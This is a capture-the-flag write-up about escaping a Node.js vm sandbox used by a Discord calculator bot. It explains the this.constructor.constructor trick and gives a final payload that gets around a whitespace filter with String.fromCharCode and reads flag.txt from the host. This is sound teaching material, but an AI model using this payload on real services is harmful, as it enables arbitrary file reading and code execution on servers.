Challenge Description

We introduced "sandboxing" using Node.js vm module on our calculator feature.
https://discord.gg/QjBQYgDpGz

Solution

When we visit the Discord server we can interact with the discordvm bot.

We also get a peek at what the source code looks like:

const vm = require('vm');
const payload = '1+1'; // user-controlled input from the calculator command
// Evaluates the payload in a fresh V8 context; note the sandbox object itself is created in the host realm
console.log(vm.runInNewContext(payload));

The problem is that spaces are not allowed in the payload, so we have to work around that restriction when sending it.

The payload we want to send looks like this:

this.constructor.constructor(String.fromCharCode(return this.process))().mainModule.require('fs').readFileSync('flag.txt')

This "breaks out" of the sandbox: `this` inside the new context is the sandbox object, which was created by the host, so `this.constructor` is the host's `Object` and `this.constructor.constructor` is the host's `Function`. The function we build with it runs outside the vm context, so `return this.process` hands us the real `process` object, and `process.mainModule.require('fs')` gives us file access. This is the well-known reason the Node.js documentation states that the vm module is not a security mechanism.

But since the payload contains whitespace, we convert every character of `return this.process` to its decimal character code and let String.fromCharCode() rebuild the string inside the sandbox. The Function body still contains the space; the payload we actually send does not.

In hindsight we could've just encoded the single whitespace character that's causing the issue, but, oh well. I was kind of tired when doing this challenge and didn't think straight ;)

The final payload ends up looking like this:

this.constructor.constructor(String.fromCharCode(114,101,116,117,114,110,32,116,104,105,115,46,112,114,111,99,101,115,115))().mainModule.require('fs').readFileSync('flag.txt')

And when we send that payload to the discord bot, we get the flag.

Flag: HTB{4lw4ys_RTFM!1}